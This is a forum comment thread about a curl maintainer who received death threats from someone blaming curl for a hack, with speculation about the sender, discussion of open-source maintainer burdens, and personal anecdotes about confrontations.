The general demeanor of that person, some of the lingo used like "rooting" or "federal server hijacking", the fact that in the screenshot he's using some text editor with ads in it to browse the offending code combined with the fact that he doesn't know what Curl is (if he did he wouldn't have sent this e-mail) screams "script kiddie" to me.
I'm not sure whether this person is actually responsible for a multi-million dollar defense project, but if he really was, it's probably a good thing he lost the deal because I definitely don't want that kind of person managing such a project.
We are dealing with a person with mental illness, because nothing is coherent. It's all made up. That's why you don't answer that kind of mail, the goal is to trigger a reaction from you.
I think its the opposite, I think its an unqualified contractor writing code he doesn't understand for complex systems and was subsequently hacked. I see this a lot with people bidding on contracts then hiring staff/developers after it's awarded to duct tape a system together that barely works and is full of holes.
I'm personally not very well-known, but I work for someone who is, and on a project that gets quite a lot of attention because of it. It's surprisingly common that people show up with extraordinary and incoherent stories. Given the author's name and email address are plastered all over, it is not surprising that such people would find him too.
This. The world is full of incompetent people winging it, and the competent ones are busy putting out the fires they left behind. It takes 3000 years to build a Ming-vase, but only a kid playing soccer to destroy it.
Making a mess is a low effort endeavour.
Cleaning it up, might as well be 1/99 of your lifetime. Tech projects are asymmetric warfare between the business side supporting the "cheapest" project approach and engineers allowed to clean it up properly only after the sunken cost fallacy trapped the clueless.
> - a solid (but wildly misplaced) basis in reality
can you explain this more ? I recognize some traits of these in me and siblings but we're not on meth at all.. so I find the psychological flaws interesting.
You bet, and thanks for your condolences. In short, almost certainly this doesn't apply to you.
The pattern is that in these scenarios, usually the people are quite intelligent and often accomplished. This gives them a repository of valid phrases and concepts to draw upon to breath legitimacy into their boogeymen. The evidence they present, however, is completely benign. That person, however, has quite the story they think is proven. It's literally as if they're showing you a basic electronic device w/ the cover removed and that proves all sorts of maliciousness.
Attempting to argue back is completely ineffective and even if you "win" one point, they'll quickly shift to another and nothing sticks, especially not the next time you talk to them.
I wouldn't even remotely compare this to more commonly contested topics like differing religious/political/social views, even at the extreme. This involves a visceral fear that >you< are actively being attacked, not some nefarious, shadow with a grand plan.
In my experience... a characteristic of this type of condition is a tendency for the brain to make connections too eagerly, and to jump to conclusions. His computer did something weird, therefore it must have been hacked. He heard about the Solarwinds breach in the news, therefore it must be related. He opened some files and saw Daniel's name, therefore he must be responsible. And so on.
It really is what my father does. We're very analytical in his side of the family. We're also prone to narrow view when we have 'attacks' we make huge amounts of logical connections that explains (or try to) what we suppose is happening and it's near impossible to deal with us until the storm is over. A kind of paranoid burst. Maybe not to the extent of your friend but from your words it's really similar.
Have you ever spoken to a professional? Even if you don't feel like anything is wrong, it can be a good to know yourself better. And if anything, potentially face an aspect of yourself that may otherwise surprise you later in life.
I have a very clear idea of what spectrum we're talking about here, but maybe it's better left unspecified to not influence too much (:
This is the sort of magical thinking that can be a symptom of paranoia, the unfortunate combination of extreme anxiety and a disengagement from realistic thinking. The person clearly does not know what Curl does and simply lashed out like a wounded animal at the first thing that caught his attention.
Bingo! It reads very similar to the GitHub repo of an insane person that was posted here about a year ago. The one where I think he/she talks of special agents and has a bunch of random files with random stuff in them.
Have you ever sat down and had a long, and deep conversation with someone suffering from severe paranoid schizophrenia after they've experienced a psychotic break?
I assure you, you will quickly understand the difference.
Especially if that someone is your previously un-diagnosed friend and business partner.
I am pretty sure they are not even a script kiddie... they are just a fairly immature troll.
Not sure what caused the original email, but the reply is just a copy/paste of various unrelated things and security incidents that the person Googled without even understanding enough about them to form a comprehensible narrative.
Which tells me they are simply trying to get a rise out of someone.
The way the grammar is constructed I would not be surprised if this came from a pre-teen.
I've been in the government contracting space for about six months but those emails look to me to be about the level of competency I'm seeing with many of my colleagues. Spaghetti code with no unit tests and nobody knows how to use a debugger let alone a profiler. Getting irrationally mad at open source devs for making changes as if they were supposed keep the Jira tickets they were working on in mind specifically. Lack of ownership. Finger pointing. This looks quite real to me.
A better analogy is a screwdriver. He made a screwdriver. Screwdrivers have millions of legitimate and essential uses. How would you build anything without one? But a criminal could also use the screwdriver to open stuff he's not supposed to. Blaming the screwdriver manufacturer for that is pointless.
Trolls prefer to use public fora in order to upset the greatest number of people possible. They don't target individuals through private correspondence.
I agree; this seems like someone with so little technical ability, that I wouldn't be surprised if he did manage to talk someone into a buying a multi million dollar defense project he could not deliver...
> I lost my family, my country my friends, my home and 6 years of work trying to build a better place for posterity.
I get loosing your family / home / friends, but a country? Where did that go?
This sounds like the result of unscrupulous "boot camps" that are common in countries like India - people are told if they sign up and pay $life_savings they can become a programmer and be hired by "The US Government" or other companies for enormous amounts of money.
A mundane class is offered with impractical advice and they're left with no money, little skills, and spamming the internet trying to get "their contract" - and if it doesn't materialize and they go back to the boot camp to complain the scammers blame it on "curl" - see the haxx.se domain? Clearly a hax0r ruined your chance at a better life.
My bet is on GPT-2 (GPT-3 would probably generate better text). This whole reply just isn't coherent (first it's a defence contract, then it's learning software for kids?).
So either AI generated or someone with some mental illness.
Gov contracting is an ecosystem on its own and those that figure out the bureaucratic hoops can survive a long time without needed much technical knowledge. Some of those individuals lose touch with what is going on outside of the defense industrial base.
It might be he did, or was planning to do, a bid on a government project that wouldn't have stood a chance in hell, but he already imagined he was going to win that bid. And then stuff happened and he felt cheated out of his chance.
Some context: Daniel is the primary maintainer of curl (the ubiquitous utility and library for HTTP requests) [1]
His name often shows up in the licensing disclosures/attributions of applications that include curl.
The general opaqueness of modern software leads people to latch onto him and his email for all manner of things, and for non developers to attribute to him all sorts of bad motives ("You hacked me!").
This is especially unfortunate as Daniel has been such a genuinely positive and helpful face to a popular open source project. I feel awful that his generosity gets repaid with this kind of crap.
That's the exact reason why I don't leave my real information anywhere on public web. Or at least try not to.
Weird that people spend each day on Facebook and Reddit among unhinged bozos, and still fail to realize how it might not be the best idea to spam their name and location on the web for all to see.
> This is especially unfortunate as Daniel has been such a genuinely positive and helpful face to a popular open source project.
I can't agree more, Daniel is one of the friendliest approachable maintainers out there. Several times he takes time to answer menial questions and is friendly about it. I recommend the curl mailing list if you work with it in any manner as for you will learn a lot from other people.
I wonder if Daniel would have received less unwanted correspondence if he had set up some kind of a foundation/shell for curl's IP from an early stage.
I'm sorry to hear that. libCurl is great and my life is better for it.
It's really best to not reply to the mentally ill people (and you can be pretty sure anyone sending something like the first is at least temporarily mentally ill).
It can sometimes be extremely tempting, I know-- especially when they've managed to say something almost perfectly constructed for pithy comeback. But it will not help you and it will not help them. If it does anything it will just encourage the behavior.
If it is any consolation lots of other people receive nasty kookmail messages -- I know first hand, in addition to the ones I get directly some of the kooks like to send massive carbon copy blasts-- as a result I have a bunch of very strange mail rules, like discarding any email that copies both a whitehouse.gov email address and Jeff Bezos, or another if both George Soros and Noam Chomsky are copied.
I never got more hate mail then when I tried doing outreach for my physics group. It did include death threats (I think) it was hard to tell if I was being accused of being part of a modern inquisition that burned people at the stake or should be burned at the stake or both.
Another good time was when I was running a crypto meetup and we had to call the cops because someone came in naked, the CIA had put chips in their clothes and they had to burn their house down so they weren't homeless but on the run.
This is not directed at you specifically, but your comment got me wondering how many people contact individuals like Daniel who are behind Open Source projects like this to share positive feedback, or even just to say "Thank you." I know I've not done it anywhere near as much as I should, and I suspect that doing so would help take the edge of what can often feel like a thankless task.
I imagine it's a bit like reviews: people with a bad experience are more likely to leave a review. Perhaps the best way to help people like David is to stop once in a while and thank them for the things they've done.
I can answer this a bit - I maintain Yarn, a JS package manager. While nowhere near Curl, it does have a fairly significant user base - at least a few million devs, from what I understand. For all this work, I received exactly two emails thanking me for my work during the past four years.
I also happen to maintain a little "Secret Santa" website, hosted on a GitHub page. Nothing too fancy, just a static app that lets you manage a Secret Santa without creating accounts. Well, every year, I receive 3-4 emails thanking me for creating it, which is even more surprising considering they often come from people that aren't from the tech world at all.
Perhaps for my happiness I should invest more in this side project than in a package manager used across the globe :)
First of all, thank you for your work for the community. But I want to put things in context too. I am primarily a backend engineer that work in Ubuntu box and using many Unix tools while maintaining a huge service containing hundred of OSS libraries. You can imagine If I have to thanks every one of them then I won't be able to do my real works. Also I don't think someone like Mr. Torvald would appreciate me adding more noise to his inbox because of my garbage email ;)
Also wanted to chime in here and say thank you for maintaining Yarn. I don’t use js often but yarn has always been my preferred tool when I do. Great to know that it has an awesome maintainer like you
> how many people contact individuals who are behind Open Source projects just to say "Thank you."
Open-source developers occasionally express dislike of "thank you" messages. They may have written that software mainly to scratch their own itch, and dealing with messages that don't say anything but thanks takes precious time out of their day. Donating money, however, is usually more welcome.
That hasn't been my experience, somewhat the opposite since people who donate money sometimes turn weird and controlling (even over pretty small amounts).
One can send thanks along with "No response expected or required!" :)
My social media bubble is one that comparatively spends a lot of thought on maintainter/contributor appreciation, and I've literally never heard that complaint.
No open source maintainer is so busy that they don't have the time to respond to a ever so rare genuine thank you with a "Thanks, glad you appreciate it!".
I can kind of understand where they're coming from. I've had people create issues or leave comments on random commits for the sole purpose of expressing thanks, which can get annoying in a bigger project. Especially when there are a few hundred people watching the repository that now each receive multiple emails they aren't interested in. That said, I still do appreciate people taking the time to express thanks when opening an issue or when I have helped them with a problem.
Yes, there are obviously some ways to express gratitude that are preferable to others, but as long as the entitled/ungrateful/"you are _supposed_ to do things this way" comments outnumber the thankful ones, I won't start complaining about them.
I've written one small open source library, which I publicized a little bit back when I first released it. Like you said, I wrote it mostly to scratch my own itch, but it was really nice to see it get some use out in the wild, and I have gotten a few emails about it over the years. Personally, I really enjoy getting any kind of emails about it from people who are using it or who have questions. (To be fair, I've never gotten the murdery emails abou it)
> It's really best to not reply to the mentally ill people
This IMO is the best way to deal with a lot of emails. I have some public software that is literally innocuous, and yet occasionally I get some very angry emails. An example: a small game where people think the game/computer is cheating (it's not).
If someone fires off an angry, irrational email to you, they aren't looking for a rational response - they are looking for a debate, or a fight, or an outlet. It's best to let them move on.
Thanks everyone for the positiveness and expression of appreciation I've sensed here. The threat has been reported to the police and I'll move on. I love you all. Now I'll go back and continue working on curl.
Thank you for your useful project and sorry you have to deal with this. Consider reporting to US authorities as well if you have not done so, (or wherever you think the threat may have originated from).
This feels to me like a person with some sort of mental illness or breakdown and delusions of grandeur and persecution. Their explanation doesn't make much sense. If I were Daniel, I wouldn't respond any further.
Sounds like someone who's developed a prototype which they had grand plans of selling for billions, which then got easily hacked because they don't understand security
The $15k figure implies that's either a bill the hackers ran up on an AWS instance or what they valued their development at
Edit: The blackmail line sounds like a ransomware attack
I disagree. I think this person may not have necessarily programmed anything serious before in their life. Or if they have, probably not a defense project.
If you read the follow-up emails - and apologies for the armchair psychiatry - I think this person is very likely in a psychotic state. Their messages sound very similar to what you find in the "BadBIOS" and other "gangstalking" communities. It's not really tethered to reality.
I think it's extremely likely the author is not a troll and possesses a sincere and high-confidence belief that powerful entities are tracking and persecuting him and that backdoors in lots of software, including curl, were placed by sinister organizations and used to facilitate spying on and attacking him. The software is perceived as a WMD or pathogen partly responsible for this incursion into his life and the damage he thinks has resulted. He's mad because he thinks Daniel is like the mayor of Flint, MI: the water is poisoning people and he's doing absolutely nothing about it. Of course you'd be angry!
This is why it's generally best to not reply to messages as extreme as these. Daniel will never be able to convince him he isn't actually the metaphorical Flint mayor. You just get sucked into a world that's very real to them and not real to you or almost anyone else. It's not possible and not a good idea to try to reason with someone like that.
Yeah, I agree. In his place, I either would have done nothing, or, maybe made a police report (not that I'd expect the police to actually do anything at this stage). Generally speaking, the less you antagonize someone whose first exchange with you is "I will slaughter you," the better, IMO.
I once tried to have a conversation with a women who tried to drive me and my bicycle off the bus lane (where she shouldn't be driving in the first place); and shouted "fuck off you pissy little cunt" to me. For some reason I thought that if I explained my perspective, she would understand.
It ended up with a broken back wheel (she kicked it) and a damaged phone (she took it out of my hand when I wanted to take a picture of the license plate and threw it on the ground).
She was clearly unhinged, but I was stupid as well. I should of just let it go; no one who starts a social interaction with "pissy little cunt" is likely to be calmed down by reason. You have nothing to gain from trying, and much to potentially lose.
> ...and shouted "fuck off you pissy little cunt" to me.
There's a name for this incident - "road rage". Very real and dangerous indeed.
People get completely irrational and agitated. Probably due to effect of being locked up, in a way, non-free inside their cars.
When I'm biking, at times I too get mad at some careless and obnoxious drivers encroaching my freedom, I guess they may be finding me just as annoying for simply missing the fatter wheels and a comparable scale on the shared road. Irrational!
As cyclists we are literally more exposed on the road. So whenever such inevitable bout of irrational fury pops, I find the safest option for myself is to steam-off using similar vocabulary. It's more efficient than reasoning with the unreasonable.
Just to be even safer, I'd let the offending four-wheeled furia be gone before naming the whole piece of that motorized content in precisely spoken choice of words...
A sad sentiment of giving up, but I think it is premature to abandon your approach. I think it may be worth trying for that small-ish fraction (call it 10%?) of people who can be talked back from their anger. Those are good conversations to have for both parties, and worth trying to have, even if it results in failure 90% of the time.
That said, I think the real lesson for you is: don't make yourself more vulnerable (e.g. letting her touch you or your stuff) if you decide to try to start a conversation!
It also points to a theory I've been considering about personhood, and how people like your driver lady is in a mindstate where, in her mind, you're not a person. It's a very, very dangerous situation, because if they don't think you're a person, then there is nothing immoral about saying or doing anything to you, including violence.
> I think the real lesson for you is: don't make yourself more vulnerable (e.g. letting her touch you or your stuff) if you decide to try to start a conversation!
I didn't "let" her, she just did it.
I know you mean well and that you probably didn't intend it like this, but this comment comes off as victim blaming quite a bit.
As for the rest: thus far I've never managed to talk random strangers down from these kind of rages; but maybe I just don't have the charm shrug Last time I tried was with my neighbour and he ended up calling the police three times over a four-day period on me. My crime? I kindly asked him to not play his music so loudly all day long at the start of the lockdown (especially at 7am) and not backing down when he tried to shout me away. I had "invaded his home" by knocking on his front door... This isn't a fit of anger, some people are just like this.
Yeah, had a neighbour lady like this recently. She was always closing her doors VERY loudly (lamps in my aartment were ringing) and when there was some argument with another neighbour, she eventually said that it was I who started banging doors. My best comparison for arguing with such people is like playing chess with pidgeon. It will throw off pieces, shit on board and be happy that it won. And you will be appaled that it didn't follow any rules, angry maybe, but is there any use to all that arguing? They will bring you down emotionally and then you only argue to have a feeling of winning. No meritoric discussion whatsoever. In such situations, just remember, that arguing with them will NOT have any utility or lasting value, it will just waste your time and mental health.
I've recently had an interaction of similar character with a neighbor in my very small apartment building, including, oddly, a door slamming component. We had had an interaction a few weeks prior that just went sideways, which caused this woman to slam her door every time I would walk past it. Since walking past her door is not optional if I want to leave my apartment (small apartment building, remember?), and this door slamming tended to startle my dog, I asked her to stop.
Because the earlier interaction I mentioned went sideways (including, among other things, her literally getting within 4 inches of my face while she was not wearing a mask), I decided to video record this most recent interaction on my phone so I would have evidence if anything went wrong that I could take to the landlord. I knew this would create an inherently more antagonistic vibe, but I felt like I had no choice after the prior incident.
Let's just say this interaction also went bad, culminating in a very minor physical assault (I was not injured -- she slapped the hand I was holding my phone in, because she did not like the fact I was recording), and a restraining order.
End of story, right?
Wrong. That restraining order, it was taken out by her against me. Her petition filing is literally nothing but gaslighting trying to paint me as the aggressor when I literally have video evidence to the contrary.
Unfortunately, due to COVID shenanigans, the court date was delayed a couple of times, and I ended up not being served notice of the actual hearing, which means I lost in a default judgement. I filed a motion to terminate her restraining order and a counter petition of my own, both of which I am currently waiting on a hearing for.
And, like your situation, because it was a neighbor, and because I have to walk past her door to get to and from my apartment, I simply don't have the choice to not interact with this person. Basically anything I could have done would be a lose / lose. Rock, meet hard place, I guess. Le sigh.
I am not blaming you. I am trying to point out places where you could have reduced the chance of being harmed. In particular, when she approached you and came within arms length, you could have put away your phone. Next time, I hope you do. That is NOT the same as saying it was your fault she destroyed it. It is her fault. My advice is based on the sad truth that the cost of getting justice >> the cost of buying a new phone, so I'm saying: when confronted with an angry person, put your valuables away, because getting them to actually replace that item will be more pain than the initial damaging interaction.
As for your neighbor, yes, it sounds like he's a crazy person. And the lockdown has taken even moderately crazy people and pushed them over the edge!
My guess would be that you're too peaceful and it shows.
There are some people who will try to bully their way through life. They will apply violent behavior (e.g. breaking your phone) to get their way. The way to stop that is to make it clear that you can apply violence, too.
Most of society works by peacefully interacting with each other. But it is crucial that everyone knows that there is a threat of violence (e.g. the police) to keep everyday life peaceful.
I wonder if I am just imagining it, but I took martial arts lessons as a kid. I've always felt like just the knowledge that I could fight has caused others to deescalate and be respectful.
Well that only works with people that are not afraid of fighting you and possibly winning against you - and there's always somebody that's better trained and/or stronger then you.
When you encounter that kind of person, if you challenge them, they will step up and fight you, because they will feel they have no other choice. Reasons could range from pride, (imagined) loss of (self) respect to just being aggressive bullies that enjoy hurting other people.
Of course if you're 6'7'' and 240 lbs not a lot of people would want to start arguing with you in the first place.
It's tautologically true that for any X, if you don't try to do X, you won't succeed. But, you also have to weigh whatever good may come of success against the probability and potential consequences of failure. In cases like these, you're by definition dealing with someone who is a little off mentally, whether that's just a temporary condition (e.g. having a bad day), or serious mental illness. Such people can tend to be unpredictable as a result, which is dangerous in its own way.
So, yes, I agree with you somewhat, but I think the balance of consequences tends to favor not acting in cases like this rather than attempting to do anything.
>A sad sentiment of giving up, but I think it is premature to abandon your approach. I think it may be worth trying for that small-ish fraction (call it 10%?) of people who can be talked back from their anger. Those are good conversations to have for both parties, and worth trying to have, even if it results in failure 90% of the time.
Please do not give terrible advice that will kill people.
Moving to NYC couple of years ago I learned the best way to deal with those type of people is to let go and move on.
It really isn't worth wasting your time and energy on those people, because they will just ruin your day. Best case scenario you feel better for couple of minutes and then you forget about it. Worst case you end up dead, in jail or worse.
> maybe made a police report (not that I'd expect the police to actually do anything at this stage).
Indeed. But one shouldn't underestimate the chance that this wouldn't be the first report about this person. Lots of similar reports like this may actually cause them to do something.
I agree, in the sense that someone who has done something of this nature is more likely to have done such a thing in the past. However, in this case, the victim is someone who is being targeted through his email address, which is embedded in open source software that's contained in gazillions of systems worldwide. That makes it significantly less likely that whomever he would report this to would have gotten another report about this particular individual.
Yeah, I agree. There's probably not much they can do about it (and the individual will probably not end up taking any action), but in case he does, it's nice to have a police record of it all.
Publishing the emails is copyright infringement; I don't think it's any other crime. And good luck trying to get someone for copyright infringement when you're threatening them with “slaughter”.
Although in that case the city was not actually hacked. It looks like this person actually got hacked by someone using curl and he is complaining that curl made it possible. I wonder if he knows anything about the people who wrote the actual exploit(s).
A bit like the time the scientology lawyers were desperate to find out who was running that server at 127.0.0.1 that had all their files on it, and really really wanted to find the person who was using the 'majordomo" login so that they could depose them
Woah, that should have been reported to the FBI as extortion. Through the (interstate) threat to report a crime falsely to the FBI, the extortioner successfully extracted a valuable service, viz. tech support, from the victim.
Many comments rush to label this guy as "mentally ill". Being an entitled asshole with misdirected anger is not necessarily a medical condition. And there are plenty of people with actual mental health problems who are not aggressive at all (statistically, mentally ill people are more likely to be victims of violence).
Health issues are a thing that happens to people, and they don't have control over it, which absolves them from responsibility for it. OTOH if the guy making these threats is just pissed off due to his own failures, or even is just a troll making it all up, he should be held responsible for his actions.
You're drawing a brighter line between mental illness and being an asshole than I would. There may be more grey area between absolution and being held responsible than you're allowing.
I'm not implying we shouldn't hold trolls responsible when they know better. From an outside perspective it would suck to have a brain that releases dopamine when causing others to suffer.
Precisely. The list of attacks (?) described in the email is an assemblage of meaningless phrases (like "favicon XML injection" and "JS stochastic Templating") and unrelated occurrences ("Solarwinds Oct/2020").
That kind of gibberish is actually a symptom of psychosis (thought disorder).
I've interacted with a few people with psychotic illness over the years (both in-real-life and online) and the distinctive language style is rather hard to miss.
The is the equivalent of sending death threats to the car company that manufactured the car that the robbers used to get away in after robbing your bank.
The problem is a common one, where someone reaches a conclusion after a sloppy investigation.
From the letter, it sounds like this guy had his life ruined, and upon investigating the hacker tools used to ruin his project and life, he jumped on the name that appeared the most in the source code.
The screenshots would have been an "I know it's you" message to him, which the sender would assume is more than enough to let him know the meaning of his email. And indeed, if Daniel had been writing haxx0r tools, the message and intent would have been crystal clear.
At this point the sender would be assuming that Daniel is just playing games with him and playing dumb, so he's pouring out his story to shame Daniel over the damage that his hacker tool has done.
If someone were to write tools specifically for evil purposes, and your life were ruined by use of said tools, you'd be screaming mad, too. And probably seeking revenge.
Except that his investigation was sloppy and incomplete; Daniel doesn't write hacker tools, he writes a HTTP client library. He's no more guilty of facilitating hacking than the writer of any runtime library's HTTP client code.
Normally, this would be a matter of setting the facts straight, but in this case a criminal investigation would probably be in order.
I think we all owe Daniel a certain amount of thanks for somehow, incidentally, maybe, preventing nutjob exhibit A from getting a multi million dollar defense project.
And anytime such unrealistic threats are made, this always makes it seem like maybe it's not so bad:
Sadly, no. V&V in defense projects are often short on evaluating security in any meaningful way. It’s mostly theater, show you ran a couple of security assessments or have a code review process that includes checking for buffer overflows and you’re fine.
Lets get our facts straight here. Does the Perseverance rover contain libcurl? It has ffmpeg, so, ... "on the planet" could be changed to "two planets in this system."
Seems like a death threat from an icloud.com address. Chances are the real name and location of the sender is available to the authorities (with consent by a judge) from Apple.
Relatedly, someone on the blog posted a comment that it might be more effective to report him to Apple than to turn a credible death threat over to law enforcement! Comments here seem acknowledge that he's delusional, but he may very well have lost a huge contract. He claims he's lost family, friends, house, and can't go back to his home country. What would Apple's move be? To lock him out without warning or due process of any sort. I don't know about any of you, but I KNOW how devastating it would be to suddenly be locked out of MY iCloud account. Do we really think that getting Apple to deplatform him will somehow assuage his stated murderous intent?! What kind of cyberpunk megacorp police state future are we advocating for here? No, the answer is to report this to local LEO and the FBI, let THEM deal with Apple to get his details, and handle whatever comes next.
I wonder what the market is for a sort of super-it lawyer service, that affords the protections of legal counsel in order to secure your data across multiple platforms and protect you from deplatforming as you describe, where they can take YOUR data, and is protected by legal counsel so that it generally can't be deplatformed by governmental entities.
Encryption has a sort of brutal effectiveness at doing this if you distribute copies of your data, but it is hard to maintain and has exposure in extreme events with your health.
Encryption + distributed data + legal protections from counsel could be an offering. It might be a "big fish" service though.
I've seen the theme of "maintainer of popular open source product is threatened by person who doesn't understand it's just a component" show up a few times, but when I think about it most those times have been related to curl specifically. Maybe it's because of the domain haxx.se? Or maybe Daniel just writes about it a lot? Does this kind of thing happen so regularly to others?
It’s because curl and libcurl are used virtually everywhere, and clearly identified. This means in any problematic or malicious device or software, odds are good the first clearly identifiable thing you’ll find are references to curl.
Though the domain probably doesn’t help with the association. If you got hacked and the first clear string you find is “haxx.se” it’s not a big leap to interpret it as a taunt.
I'm guessing it is because people who create these hacking tools often need to do HTTP requests, so they just copy in libcurl source and before you know it Daniel's name is associated with all these tools and attacks.
'man curl' lists Daniel. I think morons that don't know what curl is only see the 'haxx.se' domain and think it's some hacker.. it's sad a person who's written a tool used by so many people and systems everyday has to deal with nonsense like this.
The thing that confuses me about that faulty line of thinking is why would a hacker include a license under their name with the software they use to hack you? What sort of gentleman hacker would follow this legal procedure in the process of illegally compromising your machine? It would be as if a burgler stole all of your stuff but left you a contract so you could legally give them ownership. I just don't understand the reasoning.
Unfortunately this is what a mental health problem looks like. Our society is ill trained to identify and deal with this category of heart breaking disease.
I mean he could just be a shitty person who’s bad at their job? I think it’s likely there’s something wrong, sure, but sometimes I worry about this constant rush to associate bad behaviour with mental illness, when none of us are psychologists and we’re certainly not that persons psychologist.
I'm not a psychiatrist, but it seems that this person has some severe psychotic disorder. The whole thing reads like a cheap knockoff of "A Beautiful Mind".
It doesn't read like that to me. It reads like someone who's an arsehole who had grand plans of their prototype being sold for billions and likely getting hacked for having no security knowledge
If you're looking for ways to be charitable, I found this (and this similar Tim Ferris post[0]) to be eye-opening view into the range of noise that people with large social wakes deal with. It's a small slice of empathy that I (and possibly others) would have lacked otherwise that makes me more understanding in interactions with folks like OSS maintainers, corporate governance, etc.
I agree, there was no need to include names in the article.
When you get messages like this, sometimes you end up taking it differently to how it appears as a third party. Any threat of violence online can be interpreted as a joke, it's not easy to tell the difference sometimes and it's harder when you're on the receiving end of it.
If this hadn't been such a dangerous threat, I'd have replied like this: "oh i'm sorry, I'll refund you of all the money you paid in licenses for curl specifically".
But, quite frankly, I'd go to the police immediately.
There's a valuable lesson in this: always reply! I wouldn't have dreamed of replying to an email like that, since I wouldn't expect to get any satisfaction from the sender. But incredibly he responded with what is probably more than enough info to secure a conviction, assuming he can be identified.
That comment made me think and I realized the following.
Open-source code like curl is inevitable when a society gains internet [1]. It's not Daniel's fault. If anything is to blame, blame the internet and human nature on a grand scale [2].
[1] If he wouldn't have made it, someone else would. If no one else would, then people would've done it privately. Some of that code would've been leaked and popularized as an open source project (it's basic probability: many people would need to do it privately, since they have to if they want their CLI to interact with the web).
[2] There was an interview I read/heard somewhere where some Twitter employee said: if there is a 1 in a 500 million chance that something could happen based on a small piece of text, it means that at Twitter, it happens every day.
Assuming the person writing is not just having a nervous breakdown or trolling (~50%), I think the metaphor they're using is very useful here:
> You built a formula 1 race car and tossed the keys to kids with ego problems.
He may have been ran over by a formula 1 race car, but for some reason he ended up writing to and blaming the guy that's building the seats. Or the tires.
Curl is an ubiquitous tool used for pretty much anything. Assuming the grievance is real, blaming it for anything is clearly a misunderstanding of the situation.
Uh... I mean, you don't really think that person has an accurate understanding of what actually happened? Because I'm having a hard time trying to imagine that. It's not that there aren't any vulnerabilities in curl that can be exploited that way, but I struggle to think of situation where curl would have been an actual culrprit. Also, it sounds like he thinks curl is something purposefully malicious.
On the matter of "inevitability of progress": yep, I even think it applies to much bigger extent. I just don't see how is this connected to the troubles of the-victim-of-curl guy.
Oh, the statement just made me pause and think that's all.
> but I struggle to think of situation where curl would have been an actual culrprit.
I agree, I think it's much more likely that there was a 2 stage type of exploit where curl was used to download the second stage locally on the machine. That's at least how curl (or wget) is used on hackthebox.eu (where everyone hacks boxes for fun).
> Open-source code like curl is inevitable when a society gains internet
Maybe, but there's maybe an alternate universe that doesn't begin with such a dumbass implementation of the web.
"Excuse me everybody, how about we not make it common for clients to describe themselves with a simple plaintext string and not have servers expect to blithely log that same string as if the invention of packet switching predates the invention of lying."
Perhaps ours is the only universe where the grad student who was supposed to utter that missed the bus that day.
Curl is a tool; and just like a knife can be used to rob a
person it can be abused for malicious purposes. That's
unavoidable no matter what kind of license it has.
I wouldn't be surprised if this interview was 3 to 5, or even more years ago. Sadly, I really don't remember, but this little tidbit stood out to me at the time. I wouldn't be surprised if the "employee" is a really high ranking one, or one of the founders even.
Death threats are pretty normal for open source devs but I actually got a rape threat recently, which kind of surprised me. Cultural differences from international communities. It was not in English.
Daniel was probably warned by many not to respond a second time, or maybe he thinks that this emailer is a crank who isn't worth responding to, but I kinda wish he would. The emailer is either experiencing the effects of curl exploits, and doing a bad job of explaining it, or is very confused about the role curl plays in exploits in general. I'm not willing to assume the latter, although I think that's the assumption most are making here.
Yeah I think a reply ignoring the threat and just explaining what Curl is would be the best approach here.
Either the person is just a crank and in that case no harm done, or the person has legitimately been affected by an exploit and at the very least it will inform them of what actually happened and how Curl isn't to blame at all.
I agree: it's a good way to handle angry people by taking it in a soft tone and explaining; it may have a positive impact on the person because someone cares, and if the person was just angry at the moment it may also help them learn something. I often tend to take some time to respond to such kind of angry messages though, you really need to make an effort on yourself to get back to a "kind" state of mind for it to work.
I think this is a good case for being pseudo-anonymous online, even in free software. The vast majority of the community is nice, but it only takes one crackpot to make your life difficult. If you are pseudo-anonymous, you are at least protected, both physically and reputation wise, on the internet. We've always told kids to not give out their name or address online; it might be good advice for everyone.
This person clearly doesn’t understand what software is and how it works. If he really lost a multi million dollar defense project to a hack it’s not a bad thing at all.
Of course this has nothing to do with curl or any other software, one can only get hacked because of their ineptitude.
I feel like the sender should take it a bit further by blaming the sun for nurturing the plants that feed the animals that sustain the belly of the coder Daniel. In other words go out on their lawn a shake a mighty fist towards the sky.
This surfaces an important point that our communities (online, offline, families, etc) have no easy solution for: if indeed some one does have a mental illness* how do you factor that in and make allowances for it? How do you quantify that the actions come from someone who is mentally unwell? And without diagnostic tooling, how do you know they are mentally ill?
* In this case there is no way to comfirm if the sender/s are mentally ill because all you have is inference to play against the words written and the images sent to Daniel.
I see someone who ended up in a bad situation because they messed up, and in their anger tries to blame someone else instead of taking responsibility.
I use free and open source software everyday in my products and I am fully aware that all of them have licenses specifically telling me that there is no warranty or liability of damages. If something goes wrong, it's on me, I made a wrong choice and I have to deal with the consequences.
And threats are not okay and should be reported to the authorities.
I have dealt with a similar situation, in a sense more than once, and my strategy was to first integrate the identified risk into my model and then compare it against my own risk profile. If the risk was above a threshold (simplifying), I take an offensive posture in cases like these.
For example, in this case, I would minimally identify and locate the individual responsible for the email. I think that is doable.
For someone who claims to have done all that, it seems odd they blame curl for the solarwinds hack... I’m guessing the idiot went through the source of some exploit dump and just decided that whoever was in the license files was the one who wrote the root kit. Because everyone knows malware authors leave their real email address in their payload.
I suppose this is an argument in favour of the asset downloading scheme pioneered by maven/gradle and nowadays adopted by many languages: The unhinged and/or ignorant won't see sane/good library code mixed into worse code that uses the libraries.
But oh god, it's not exactly a technical argument.
After reading it a few times, I think it's not about some script kiddie using curl to hack into his system.
Although I condemn Al Nocai's method, I feel for him and I am inclined to adopt the contrarian opinion that he probably got screwed because of the bad quality of curl.
The deeper underlying systemic problem is that open-source is a way to disclaim all responsibilities. When some open-source project has some level of reach there needs to be quality requirements and regular security audits. (like they (last?) did in 2016, https://daniel.haxx.se/blog/2016/11/23/curl-security-audit/)
Otherwise it's like the OpenSSL's heartbleed story where a few unpaid project maintainers hold the keys to the world.
In today's interdependent world, when trying to build something, we are more and more reliant on the quality of the library we use. As a product builder facing the client you get to bear the responsibility when your client has a problem because of a library you use. But when open-source software removed the possibility of competing solutions by providing free "as is" software, you can't realistically chose not to use it, and you are the one left holding the bag and paying the price for others mistakes.
That's indeed the failure of the system : something sensitive used by billions not being able to pay for a regular audit.
If no one wants to pay for it to have the required quality, why not make it a public utility properly funded by tax, as a public service ; instead of later paying the costs in various form of the consequences of the vulnerabilities.
I haven't seen much evidence of this happening on anything approaching a wide scale. For example the piece of software in the article is used almost everywhere, governments, companies etc and yet it still cannot get the funds for yearly audits.
If he's the one using cURL, does that mean that he is one of the kids in the phrase 'You built a formula 1 race car and tossed the keys to kids with ego problems.'?
